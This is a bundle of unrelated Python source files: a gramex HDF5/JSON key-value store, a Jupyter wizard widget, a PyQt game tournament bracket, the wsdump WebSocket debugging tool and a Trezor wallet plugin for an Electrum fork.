>>> value = store.load(key)
>>> store.dump(key, value)
Internally, it uses HDF5 groups to store data. Values are encoded as JSON
using gramex.config.CustomJSONEncoder (thus handling datetime.) Keys are JSON
encoded, and '/' is escaped as well (since HDF5 groups treat / as subgroups.)
'''
def __init__(self, path, *args, **kwargs):
super(HDF5Store, self).__init__(*args, **kwargs)
self.path = _create_path(path)
self.changed = False
import h5py
# h5py.File fails with OSError: Unable to create file (unable to open file: name =
# '.meta.h5', errno = 17, error message = 'File exists', flags = 15, o_flags = 502)
# TODO: identify why this happens and resolve it.
self.store = h5py.File(self.path, 'a')
def load(self, key, default=None):
# Keys cannot contain / in HDF5 store. Escape it
key = self._escape(key).replace('/', '\t')
result = self.store.get(key, None)
if result is None:
return default
try:
return json.loads(
result.value,
object_pairs_hook=AttrDict,
cls=CustomJSONDecoder)
except ValueError:
            app_log.error('HDF5Store("%s").load("%s") is not JSON ("%r...")',
self.path, key, result.value)
return default
def dump(self, key, value):
key = self._escape(key)
if self.store.get(key) != value:
if key in self.store:
del self.store[key]
self.store[key] = json.dumps(
value,
ensure_ascii=True,
separators=(',', ':'),
cls=CustomJSONEncoder)
self.changed = True
def _escape(self, key):
'''
Converts key into a unicode string (interpreting byte-string keys as UTF-8).
HDF5 does not accept / in key names. Replace those with tabs.
'''
if isinstance(key, six.binary_type):
key = six.text_type(key, encoding='utf-8')
else:
key = six.text_type(key)
return key.replace('/', '\t')
def keys(self):
# Keys cannot contain / in HDF5 store. Unescape it
return (key.replace('\t', '/') for key in self.store.keys())
def flush(self):
super(HDF5Store, self).flush()
if self.changed:
app_log.debug('Flushing %s', self.path)
self.store.flush()
self.changed = False
def purge(self):
'''
Load all keys into self.store. Delete what's required. Save.
'''
self.flush()
changed = False
items = {
key: json.loads(
val.value, object_pairs_hook=AttrDict, cls=CustomJSONDecoder)
for key, val in self.store.items()
}
for key in self.purge_keys(items):
del self.store[key]
changed = True
if changed:
app_log.debug('Purging %s', self.path)
self.store.flush()
def close(self):
try:
self.store.close()
# h5py.h5f.get_obj_ids often raises a ValueError: Not a file id.
# This is presumably if the file handle has been closed. Log & ignore.
except ValueError:
app_log.debug('HDF5Store("%s").close() error ignored', self.path)
class JSONStore(KeyStore):
'''
A KeyStore that stores data in a JSON file. Typical usage::
>>> store = JSONStore('file.json', flush=15)
>>> value = store.load(key)
>>> store.dump(key, value)
This is less efficient than HDF5Store for large data, but is human-readable.
    It also cannot support multiple instances. Only one JSONStore instance
is permitted per file.
'''
def __init__(self, path, *args, **kwargs):
super(JSONStore, self).__init__(*args, **kwargs)
self.path = _create_path(path)
self.store = self._read_json()
self.changed = False
self.update = {} # key-values added since flush
def _read_json(self):
try:
with io.open(self.path) as handle: # noqa: no encoding for json
return json.load(handle, cls=CustomJSONDecoder)
except (IOError, ValueError):
return {}
def _write_json(self, data):
json_value = json.dumps(
data,
ensure_ascii=True,
separators=(',', ':'),
cls=CustomJSONEncoder)
with io.open(self.path, 'w') as handle: # noqa: no encoding for json
handle.write(json_value)
def dump(self, key, value):
'''Same as store[key] = value'''
key = self._escape(key)
if self.store.get(key) != value:
self.store[key] = value
self.update[key] = value
self.changed = True
def flush(self):
super(JSONStore, self).flush()
if self.changed:
app_log.debug('Flushing %s', self.path)
store = self._read_json()
store.update(self.update)
self._write_json(store)
self.store = store
self.update = {}
self.changed = False
def purge(self):
'''
Load all keys into self.store. Delete what's required. Save.
'''
self.flush()
changed = False
for key in self.purge_keys(self.store):
del self.store[key]
changed = True
if changed:
app_log.debug('Purging %s', self.path)
self._write_json(self.store)
def close(self):
try:
self.flush()
# This has happened when the directory was deleted. Log & ignore.
except OSError:
app_log.error('Cannot flush %s', self.path)
def _create_path(path):
# Ensure that path directory exists
path = os.path.abspath(path)
folder = os.path.dirname(path)
if not os.path.exists(folder):
os.makedirs(folder)
return path
def sizeof(obj):
if isinstance(obj, dict):
return sys.getsizeof(obj) + sum(sizeof(k) + sizeof(v) for k, v in obj.items())
elif isinstance(obj, (set, list)):
return sys.getsizeof(obj) + sum(sizeof(v) for v in obj)
return sys.getsizeof(obj)
|
wizard.py
|
"""The wizard application allows the implementation of a Wizard-like GUI.
Authors:
* Carl Simon Adorf <simon.adorf@epfl.ch>
"""
from enum import Enum
from time import sleep
from time import time
from threading import Thread
import traitlets
import ipywidgets as ipw
class WizardAppWidgetStep(traitlets.HasTraits):
"One step of a WizardAppWidget."
class State(Enum):
"""Each step is always in one specific state.
The state is used to determine:
1) how the step is visually presented to the user, and
2) whether the next step is accessible (i.e. reached the SUCCESS state).
App developers are encouraged to use the step states to couple application
logic and interface. In general, all widget changes should trigger
a re-evaluation of the step state, and states also determine whether certain
widgets are enabled or disabled.
A step can be in one of the following states:
INIT: The initial state, usually all widgets disabled.
READY: The step (widget) is ready for user input (some or all widgets enabled).
CONFIGURED: The step is in a consistent configuration awaiting confirmation.
ACTIVE: The step is carrying out a runtime operation.
SUCCESS: A configuration has been confirmed / a runtime operation successfully finished.
FAIL: A runtime operation has failed in an unrecoverable way.
Not all steps must implement all states, for example:
- the first step does not need an INIT state
- a step without runtime process should not have an ACTIVE or FAIL state
- a "review & confirm" step does not require a READY state.
        - a step without configuration options (e.g. a pure "review & confirm" step)
          does not need a CONFIGURED state
Important: The next step is only accessible if the current step is within the SUCCESS
state!
"""
INIT = 0 # the step is initialized and all widgets are typically disabled
# The step is correctly configured and can in principle be confirmed.
CONFIGURED = 1 # configuration is valid
READY = 2 # step is ready for user input
ACTIVE = 3 # step is carrying out a runtime operation
SUCCESS = 4 # step has successfully completed
# All error states have negative codes
FAIL = -1 # the step has unrecoverably failed
state = traitlets.UseEnum(State)
auto_advance = traitlets.Bool()
def can_reset(self):
return hasattr(self, "reset")
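# Illustrative sketch (not part of the original module): a minimal concrete step that follows
# the State contract described above -- READY until its text field is filled, then SUCCESS.
# It could be wired into the widget below as
#   WizardAppWidget(steps=[("Name", _ExampleNameStep()), ("Confirm", another_step)])
class _ExampleNameStep(ipw.VBox, WizardAppWidgetStep):
    def __init__(self, **kwargs):
        self.name = ipw.Text(description="Name:")
        self.name.observe(self._update_state, names="value")
        super().__init__(children=[self.name], **kwargs)

    def _update_state(self, _=None):
        self.state = (
            self.State.SUCCESS if self.name.value.strip() else self.State.READY
        )

    def reset(self):
        self.name.value = ""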
class WizardAppWidget(ipw.VBox):
    ICON_SEPARATOR = "\u2000"  # en quad (a wide space placed between the icon and the title)
ICONS = {
WizardAppWidgetStep.State.INIT: "\u25cb",
WizardAppWidgetStep.State.READY: "\u25ce",
WizardAppWidgetStep.State.CONFIGURED: "\u25cf",
WizardAppWidgetStep.State.ACTIVE: ["\u25dc", "\u25dd", "\u25de", "\u25df"],
WizardAppWidgetStep.State.SUCCESS: "\u2713",
WizardAppWidgetStep.State.FAIL: "\u00d7",
}
@classmethod
    def icons(cls):
        """Return the icon set, selecting animated icon frames based on the current time stamp."""
t = time()
return {
key: item
if isinstance(item, str)
else item[int((t * len(item) % len(item)))]
for key, item in cls.ICONS.items()
}
selected_index = traitlets.Int(allow_none=True)
def __init__(self, steps, **kwargs):
# The number of steps must be greater than one
# for this app's logic to make sense.
if len(steps) < 2:
raise ValueError(
"The number of steps of a WizardAppWidget must be at least two."
)
self.steps = steps
# Unzip the steps to titles and widgets.
self.titles, widgets = zip(*steps)
# Initialize the accordion with the widgets ...
self.accordion = ipw.Accordion(children=widgets)
self._update_titles()
ipw.link((self.accordion, "selected_index"), (self, "selected_index"))
# Automatically update titles to implement the "spinner"
def spinner_thread():
while True:
sleep(0.1)
self._update_titles()
Thread(target=spinner_thread).start()
# Watch for changes to each step's state
for widget in widgets:
if not widget.has_trait("state"):
raise TypeError(
f"The provided '{widget}' as wizard app step has no `state` trait. "
"It is expected that step classes are derived from the WizardAppWidgetStep class."
)
widget.observe(self._update_step_state, names=["state"])
self.reset_button = ipw.Button(
description="Reset",
icon="undo",
layout=ipw.Layout(width="auto", flex="1 1 auto"),
tooltip="Reset the app to start over (if possible)",
disabled=True,
)
self.reset_button.on_click(self._on_click_reset_button)
# Create a back-button, to switch to the previous step when possible:
self.back_button = ipw.Button(
description="Previous step",
icon="step-backward",
layout=ipw.Layout(width="auto", flex="1 1 auto"),
tooltip="Go to the previous step.",
disabled=True,
)
self.back_button.on_click(self._on_click_back_button)
# Create a next-button, to switch to the next step when appropriate:
self.next_button = ipw.Button(
description="Next step",
icon="step-forward",
layout=ipw.Layout(width="auto", flex="1 1 auto"),
tooltip="Go to the next step.",
disabled=True,
)
self.next_button.on_click(self._on_click_next_button)
header = ipw.HBox(
children=[self.back_button, self.reset_button, self.next_button]
)
super().__init__(children=[header, self.accordion], **kwargs)
def _update_titles(self):
for i, (title, widget) in enumerate(zip(self.titles, self.accordion.children)):
icon = self.icons().get(widget.state, str(widget.state).upper())
self.accordion.set_title(i, f"{icon} Step {i+1}: {title}")
def _consider_auto_advance(self, _=None):
"""Determine whether the app should automatically advance to the next step.
This is performed whenever the current step is within the SUCCESS state and has
the auto_advance attribute set to True.
"""
with self.hold_trait_notifications():
index = self.accordion.selected_index
last_step_selected = index + 1 == len(self.accordion.children)
selected_widget = self.accordion.children[index]
if (
selected_widget.auto_advance
and not last_step_selected
and selected_widget.state == WizardAppWidgetStep.State.SUCCESS
):
self.accordion.selected_index += 1
def _update_step_state(self, _):
with self.hold_trait_notifications():
self._update_titles()
self._update_buttons()
self._consider_auto_advance()
@traitlets.observe("selected_index")
def _observe_selected_index(self, change):
"Activate/deactivate the next-button based on which step is selected."
self._update_buttons()
    def can_reset(self):
        steps = list(self.accordion.children)
        if any(not step.can_reset() for step in steps):
            return False
        # Only offer a reset if at least one step has progressed beyond INIT.
        return any(step.state is not WizardAppWidgetStep.State.INIT for step in steps)
def _update_buttons(self):
with self.hold_trait_notifications():
index = self.accordion.selected_index
if index is None:
self.back_button.disabled = True
self.next_button.disabled = True
self.reset_button.disabled = True
else:
first_step_selected = index == 0
last_step_selected = index + 1 == len(self.accordion.children)
selected_widget = self.accordion.children[index]
self.back_button.disabled = (
first_step_selected
or selected_widget.state
in (
WizardAppWidgetStep.State.ACTIVE,
WizardAppWidgetStep.State.SUCCESS,
WizardAppWidgetStep.State.FAIL,
)
)
self.next_button.disabled = (
last_step_selected
or selected_widget.state is not WizardAppWidgetStep.State.SUCCESS
)
self.reset_button.disabled = not self.can_reset()
def reset(self, step=0):
"""Reset the app up to the given step.
For example, with step=0 (the default), the whole app is reset.
With step=1, all but the first step are reset.
"""
with self.hold_sync():
for index in reversed(range(step, len(self.accordion.children))):
if hasattr(self.accordion.children[index], "reset"):
self.accordion.children[index].reset()
self.accordion.selected_index = step
def _on_click_reset_button(self, _):
self.reset()
def _on_click_back_button(self, _):
self.accordion.selected_index -= 1
def _on_click_next_button(self, _):
self.accordion.selected_index += 1
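# Illustrative usage sketch (assumption, not part of the original module): assembling a
# wizard from (title, widget) pairs in a Jupyter notebook, e.g. with steps such as the
# hypothetical _ExampleConfirmStep above. At least two steps are required.
#
#     wizard = WizardAppWidget(
#         steps=[
#             ("Configure", _ExampleConfirmStep()),
#             ("Review and submit", _ExampleConfirmStep()),
#         ]
#     )
#     display(wizard)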
|
TournamentGame.py
|
import random
import sys
from PyQt5.QtWidgets import QApplication
from client.Game import Game
from multiprocessing import Queue, Process
from client.TournamentWinner import DisplayWinner
def _start_tournament_(player1_id: str, player1_spacecraft: str,
player2_id: str, player2_spacecraft: str,
player3_id: str, player3_spacecraft: str,
player4_id: str, player4_spacecraft: str,
player5_id: str = "", player5_spacecraft: str = "",
player6_id: str = "", player6_spacecraft: str = "",
player7_id: str = "", player7_spacecraft: str = "",
player8_id: str = "", player8_spacecraft: str = ""):
player_ids = [player1_id, player2_id, player3_id, player4_id]
player_spacecrafts = [player1_spacecraft, player2_spacecraft, player3_spacecraft, player4_spacecraft]
if not player5_id == "":
player_ids.append(player5_id)
player_ids.append(player6_id)
player_ids.append(player7_id)
player_ids.append(player8_id)
player_spacecrafts.append(player5_spacecraft)
player_spacecrafts.append(player6_spacecraft)
player_spacecrafts.append(player7_spacecraft)
player_spacecrafts.append(player8_spacecraft)
rand_idx = random.sample(range(0, len(player_ids)), len(player_ids))
queue = Queue()
if len(player_ids) == 4:
winner1_id = _game_process(queue, player_ids[rand_idx[0]], player_spacecrafts[rand_idx[0]],
player_ids[rand_idx[1]], player_spacecrafts[rand_idx[1]])
winner1_spacecraft = player_spacecrafts[player_ids.index(winner1_id)]
print(f'WINNER ROUND 1: {winner1_id}')
winner2_id = _game_process(queue, player_ids[rand_idx[2]], player_spacecrafts[rand_idx[2]],
player_ids[rand_idx[3]], player_spacecrafts[rand_idx[3]])
winner2_spacecraft = player_spacecrafts[player_ids.index(winner2_id)]
print(f'WINNER ROUND 2: {winner2_id}')
finals_winner_id = _game_process(queue, winner1_id, winner1_spacecraft,
winner2_id, winner2_spacecraft)
finals_winner_spacecraft = player_spacecrafts[player_ids.index(finals_winner_id)]
print(f'TOURNAMENT WINNER: {finals_winner_id}')
_display_winner_process(finals_winner_id, finals_winner_spacecraft)
elif len(player_ids) == 8:
winner1_id = _game_process(queue, player_ids[rand_idx[0]], player_spacecrafts[rand_idx[0]],
player_ids[rand_idx[1]], player_spacecrafts[rand_idx[1]])
winner1_spacecraft = player_spacecrafts[player_ids.index(winner1_id)]
print(f'WINNER GAME 1 [QUARTERFINALS]: {winner1_id}')
winner2_id = _game_process(queue, player_ids[rand_idx[2]], player_spacecrafts[rand_idx[2]],
player_ids[rand_idx[3]], player_spacecrafts[rand_idx[3]])
winner2_spacecraft = player_spacecrafts[player_ids.index(winner2_id)]
print(f'WINNER GAME 2 [QUARTERFINALS]: {winner2_id}')
winner3_id = _game_process(queue, player_ids[rand_idx[4]], player_spacecrafts[rand_idx[4]],
player_ids[rand_idx[5]], player_spacecrafts[rand_idx[5]])
winner3_spacecraft = player_spacecrafts[player_ids.index(winner3_id)]
print(f'WINNER GAME 3 [QUARTERFINALS]: {winner3_id}')
winner4_id = _game_process(queue, player_ids[rand_idx[6]], player_spacecrafts[rand_idx[6]],
player_ids[rand_idx[7]], player_spacecrafts[rand_idx[7]])
winner4_spacecraft = player_spacecrafts[player_ids.index(winner4_id)]
print(f'WINNER GAME 4 [QUARTERFINALS]: {winner4_id}')
semifinals_winner1_id = _game_process(queue, winner1_id, winner1_spacecraft,
winner2_id, winner2_spacecraft)
semifinals_winner1_spacecraft = player_spacecrafts[player_ids.index(semifinals_winner1_id)]
print(f'WINNER GAME 1 [SEMIFINALS]: {semifinals_winner1_id}')
semifinals_winner2_id = _game_process(queue, winner3_id, winner3_spacecraft,
winner4_id, winner4_spacecraft)
semifinals_winner2_spacecraft = player_spacecrafts[player_ids.index(semifinals_winner2_id)]
print(f'WINNER GAME 2 [SEMIFINALS]: {semifinals_winner2_id}')
# THE GRAND FINALE
finals_winner_id = _game_process(queue, semifinals_winner1_id, semifinals_winner1_spacecraft,
semifinals_winner2_id, semifinals_winner2_spacecraft)
finals_winner_spacecraft = player_spacecrafts[player_ids.index(finals_winner_id)]
print(f'TOURNAMENT WINNER: {finals_winner_id}')
_display_winner_process(finals_winner_id, finals_winner_spacecraft)
def _game_process(queue, player1_id, player1_spacecraft,
player2_id, player2_spacecraft) -> str:
process = Process(target=_start_game_, args=(queue, player1_id, player1_spacecraft,
player2_id, player2_spacecraft))
process.start()
winner_id = queue.get()
process.terminate()
return winner_id
def _start_game_(queue: Queue, player1_id, player1_spacecraft,
player2_id, player2_spacecraft):
app = QApplication(sys.argv)
game = TournamentGame(queue=queue, player1_id=player1_id, player1_spacecraft=player1_spacecraft,
player2_id=player2_id, player2_spacecraft=player2_spacecraft)
game.show()
sys.exit(app.exec_())
def _display_winner_process(winner: str, spacecraft: str):
process = Process(target=_display_winner, args=(winner, spacecraft))
process.start()
def _display_winner(winner: str, spacecraft: str):
app = QApplication(sys.argv)
dspl_wn = DisplayWinner(winner=winner, spacecraft=spacecraft)
dspl_wn.show()
sys.exit(app.exec_())
class TournamentGame(Game):
def __init__(self, queue: Queue, player1_id: str, player1_spacecraft: str,
player2_id: str, player2_spacecraft: str):
super().__init__(player_id=player1_id, player_spacecraft=player1_spacecraft,
player2_id=player2_id, player2_spacecraft=player2_spacecraft)
self.queue = queue
self.tournament_mode = True
def game_over(self):
super().game_over()
self.queue.put(self.winner.username)
self.queue.close()
# self.display_winner = DisplayWinner(self.winner.username)
# self.display_winner.show()
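# Illustrative usage sketch (assumption, not part of the original module): starting a
# four-player bracket. The player ids and spacecraft names below are hypothetical.
#
#     if __name__ == '__main__':
#         _start_tournament_('alice', 'falcon', 'bob', 'viper',
#                            'carol', 'raptor', 'dave', 'comet')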
|
wsdump.py
|
#!/usr/share/nginx/html/appbot2/bin/python
import argparse
import code
import sys
import threading
import time
import ssl
import six
from six.moves.urllib.parse import urlparse
import websocket
try:
import readline
except ImportError:
pass
def get_encoding():
encoding = getattr(sys.stdin, "encoding", "")
if not encoding:
return "utf-8"
else:
return encoding.lower()
OPCODE_DATA = (websocket.ABNF.OPCODE_TEXT, websocket.ABNF.OPCODE_BINARY)
ENCODING = get_encoding()
class VAction(argparse.Action):
def __call__(self, parser, args, values, option_string=None):
if values is None:
values = "1"
try:
values = int(values)
except ValueError:
values = values.count("v") + 1
setattr(args, self.dest, values)
def parse_args():
parser = argparse.ArgumentParser(description="WebSocket Simple Dump Tool")
parser.add_argument("url", metavar="ws_url",
help="websocket url. ex. ws://echo.websocket.org/")
parser.add_argument("-p", "--proxy",
help="proxy url. ex. http://127.0.0.1:8080")
parser.add_argument("-v", "--verbose", default=0, nargs='?', action=VAction,
dest="verbose",
help="set verbose mode. If set to 1, show opcode. "
"If set to 2, enable to trace websocket module")
parser.add_argument("-n", "--nocert", action='store_true',
help="Ignore invalid SSL cert")
parser.add_argument("-r", "--raw", action="store_true",
help="raw output")
parser.add_argument("-s", "--subprotocols", nargs='*',
help="Set subprotocols")
parser.add_argument("-o", "--origin",
help="Set origin")
parser.add_argument("--eof-wait", default=0, type=int,
help="wait time(second) after 'EOF' received.")
parser.add_argument("-t", "--text",
help="Send initial text")
parser.add_argument("--timings", action="store_true",
help="Print timings in seconds")
parser.add_argument("--headers",
help="Set custom headers. Use ',' as separator")
return parser.parse_args()
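# Illustrative invocations (examples only; the URLs are placeholders, the options are
# the ones defined in parse_args above):
#
#     python wsdump.py ws://echo.websocket.org/ -t "hello"
#     python wsdump.py wss://example.org/socket -n -v --timings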
class RawInput:
def raw_input(self, prompt):
if six.PY3:
line = input(prompt)
else:
line = raw_input(prompt)
if ENCODING and ENCODING != "utf-8" and not isinstance(line, six.text_type):
line = line.decode(ENCODING).encode("utf-8")
elif isinstance(line, six.text_type):
line = line.encode("utf-8")
return line
class InteractiveConsole(RawInput, code.InteractiveConsole):
def write(self, data):
sys.stdout.write("\033[2K\033[E")
# sys.stdout.write("\n")
sys.stdout.write("\033[34m< " + data + "\033[39m")
sys.stdout.write("\n> ")
sys.stdout.flush()
def read(self):
return self.raw_input("> ")
class NonInteractive(RawInput):
def write(self, data):
sys.stdout.write(data)
sys.stdout.write("\n")
sys.stdout.flush()
def read(self):
return self.raw_input("")
def main():
start_time = time.time()
args = parse_args()
if args.verbose > 1:
websocket.enableTrace(True)
options = {}
if args.proxy:
p = urlparse(args.proxy)
options["http_proxy_host"] = p.hostname
options["http_proxy_port"] = p.port
if args.origin:
options["origin"] = args.origin
if args.subprotocols:
options["subprotocols"] = args.subprotocols
opts = {}
if args.nocert:
opts = {"cert_reqs": ssl.CERT_NONE, "check_hostname": False}
if args.headers:
options['header'] = map(str.strip, args.headers.split(','))
ws = websocket.create_connection(args.url, sslopt=opts, **options)
if args.raw:
console = NonInteractive()
else:
console = InteractiveConsole()
print("Press Ctrl+C to quit")
def recv():
try:
frame = ws.recv_frame()
except websocket.WebSocketException:
return websocket.ABNF.OPCODE_CLOSE, None
if not frame:
raise websocket.WebSocketException("Not a valid frame %s" % frame)
elif frame.opcode in OPCODE_DATA:
return frame.opcode, frame.data
elif frame.opcode == websocket.ABNF.OPCODE_CLOSE:
ws.send_close()
return frame.opcode, None
elif frame.opcode == websocket.ABNF.OPCODE_PING:
ws.pong(frame.data)
return frame.opcode, frame.data
return frame.opcode, frame.data
def recv_ws():
while True:
opcode, data = recv()
msg = None
if six.PY3 and opcode == websocket.ABNF.OPCODE_TEXT and isinstance(data, bytes):
data = str(data, "utf-8")
if not args.verbose and opcode in OPCODE_DATA:
msg = data
elif args.verbose:
msg = "%s: %s" % (websocket.ABNF.OPCODE_MAP.get(opcode), data)
if msg is not None:
if args.timings:
console.write(str(time.time() - start_time) + ": " + msg)
else:
console.write(msg)
if opcode == websocket.ABNF.OPCODE_CLOSE:
break
thread = threading.Thread(target=recv_ws)
thread.daemon = True
thread.start()
if args.text:
ws.send(args.text)
while True:
try:
message = console.read()
ws.send(message)
except KeyboardInterrupt:
return
except EOFError:
time.sleep(args.eof_wait)
return
if __name__ == "__main__":
try:
main()
except Exception as e:
print(e)
|
trezor.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from btn_electrum.util import bfh, bh2u, versiontuple, UserCancelled
from btn_electrum.btn import (b58_address_to_hash160, xpub_from_pubkey,
TYPE_ADDRESS, TYPE_SCRIPT, btn_addr_to_bitcoin_addr)
from btn_electrum import constants
from btn_electrum.i18n import _
from btn_electrum.plugins import BasePlugin, Device
from btn_electrum.transaction import deserialize, Transaction
from btn_electrum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey, xtype_from_derivation
from btn_electrum.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
RECOVERY_TYPE_SCRAMBLED_WORDS, RECOVERY_TYPE_MATRIX = range(0, 2)
# script "generation"
SCRIPT_GEN_LEGACY, SCRIPT_GEN_P2SH_SEGWIT, SCRIPT_GEN_NATIVE_SEGWIT = range(0, 3)
class TrezorKeyStore(Hardware_KeyStore):
hw_type = 'trezor'
device = 'TREZOR'
def get_derivation(self):
return self.derivation
def get_script_gen(self):
xtype = xtype_from_derivation(self.derivation)
if xtype in ('p2wpkh', 'p2wsh'):
return SCRIPT_GEN_NATIVE_SEGWIT
elif xtype in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return SCRIPT_GEN_P2SH_SEGWIT
else:
return SCRIPT_GEN_LEGACY
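    # Illustrative mapping (assumption, for clarity only): with standard Electrum-style
    # derivations, m/84'/... yields xtype 'p2wpkh' -> SCRIPT_GEN_NATIVE_SEGWIT, and
    # m/49'/... yields 'p2wpkh-p2sh' -> SCRIPT_GEN_P2SH_SEGWIT; any other derivation
    # falls back to SCRIPT_GEN_LEGACY.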
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d" % sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise Exception(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types
firmware_URL = 'https://wallet.trezor.io'
libraries_URL = 'https://github.com/trezor/python-trezor'
minimum_firmware = (1, 5, 2)
keystore_class = TrezorKeyStore
minimum_library = (0, 9, 0)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
# Minimal test if python-trezor is installed
import trezorlib
try:
library_version = trezorlib.__version__
except AttributeError:
# python-trezor only introduced __version__ in 0.9.0
library_version = 'unknown'
if library_version == 'unknown' or \
versiontuple(library_version) < self.minimum_library:
self.libraries_available_message = (
_("Library version for '{}' is too old.").format(name)
+ '\nInstalled: {}, Needed: {}'
.format(library_version, self.minimum_library))
self.print_stderr(self.libraries_available_message)
raise ImportError()
self.libraries_available = True
except ImportError:
self.libraries_available = False
return
from . import client
from . import transport
import trezorlib.ckd_public
import trezorlib.messages
self.client_class = client.TrezorClient
self.ckd_public = trezorlib.ckd_public
self.types = trezorlib.messages
self.DEVICE_IDS = ('TREZOR',)
self.transport_handler = transport.TrezorTransport()
self.device_manager().register_enumerate_func(self.enumerate)
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(d.get_path(), -1, d.get_path(), 'TREZOR', 0) for d in devices]
def create_client(self, device, handler):
try:
self.print_error("connecting to device at", device.path)
transport = self.transport_handler.get_transport(device.path)
except BaseException as e:
self.print_error("cannot connect at", device.path, str(e))
return None
if not transport:
self.print_error("cannot connect at", device.path)
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
handler.show_error(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Btn"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
model = client.get_trezor_model()
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, model)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
traceback.print_exc(file=sys.stderr)
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection, recovery_type = settings
if method == TIM_RECOVER and recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"), blocking=True)
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
if recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
recovery_type_trezor = self.types.RecoveryDeviceType.ScrambledWords
else:
recovery_type_trezor = self.types.RecoveryDeviceType.Matrix
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language, type=recovery_type_trezor)
if recovery_type == RECOVERY_TYPE_MATRIX:
handler.close_matrix_dialog()
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise Exception(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
